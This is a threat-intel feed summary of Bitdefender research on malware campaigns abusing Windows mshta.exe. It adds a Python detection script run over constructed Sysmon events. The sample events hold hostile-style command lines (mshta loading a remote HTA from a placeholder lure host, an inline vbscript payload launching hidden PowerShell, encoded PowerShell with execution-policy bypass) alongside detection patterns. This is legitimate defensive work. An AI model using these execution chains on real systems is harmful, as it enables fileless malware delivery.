Microsoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows
ID: 005d0f43-2604-5dc3-acdd-d1ab43028f08
STIX ID: report--005d0f43-2604-5dc3-acdd-d1ab43028f08
Feed Name: Bitdefender Labs
Bitdefender researchers analyzed widespread abuse of the legacy Windows mshta.exe utility (the Microsoft HTML Application host) by multiple criminal campaigns, including CountLoader, Emmenhtal Loader, LummaStealer, Amatera, ClipBanker and PurpleFox. The report describes multi-stage, often fileless infection chains built on obfuscated HTA and PowerShell code, delivered through social-engineering lures such as fake installers and clipboard-hijacking "human verification" pages. It includes detailed IoCs (domains, URLs, IPs, SHA256 hashes), notes observed infrastructure shifts (TLD patterns), and recommends user-level and technical mitigations to reduce exposure.
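The detection angle a SOC team would want from this summary is process-creation telemetry around mshta.exe: a remote URL on its command line, an inline `vbscript:`/`javascript:` payload, or an interpreter such as PowerShell spawned with mshta.exe as parent. The script below is an added example written for this page, not code or IoCs from the Bitdefender report; it runs over constructed Sysmon-style (Event ID 1) events with hypothetical `.invalid` hostnames, and the rule names and field names are my own assumptions.

```python
import re

# Constructed sample process-creation events using Sysmon Event ID 1 style fields.
# These are illustrative only, not indicators from the Bitdefender report; the
# hostname uses the reserved .invalid TLD so it can never resolve.
SAMPLE_EVENTS = [
    {   # ClickFix-style lure: user pastes a command into the Run dialog,
        # so explorer.exe is the parent and mshta fetches a remote HTA.
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"mshta https://verify-human.invalid/check.hta",
    },
    {   # Inline script via the vbscript: protocol handler; nothing is written to disk.
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -w hidden"":close")',
    },
    {   # Second stage: PowerShell spawned by mshta with an encoded command
        # (SQBFAFgA is the UTF-16LE base64 of "IEX", constructed for the sample).
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"powershell -w hidden -ep bypass -enc SQBFAFgA",
    },
    {   # Benign baseline: a locally installed HTA opened by double-click.
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\Setup\wizard.hta"',
    },
]

REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
SCRIPT_PROTO = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.IGNORECASE)
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe",
}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the rule names an event trips; an empty list means no alert."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe":
        # mshta will happily load an HTA straight from a URL.
        if REMOTE_URL.search(cmd):
            hits.append("mshta_remote_url")
        # Protocol-handler payloads run without any file on disk.
        if SCRIPT_PROTO.search(cmd):
            hits.append("mshta_inline_script")
    if parent == "mshta.exe" and image in INTERPRETERS:
        hits.append("mshta_spawns_interpreter")
        if image in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(cmd):
            hits.append("encoded_powershell")
    return hits


def analyze(events: list) -> list:
    """Return (index, rule_names) for every event that trips at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, rules in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The local-HTA event is deliberately left unflagged: mshta.exe opening a file under Program Files from Explorer is what legitimate HTA use looks like, and alerting on every mshta launch produces noise that gets tuned out. Where the tool has no business purpose at all, blocking it outright with AppLocker or WDAC is simpler than detection, but that is an environment decision rather than something this summary prescribes.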
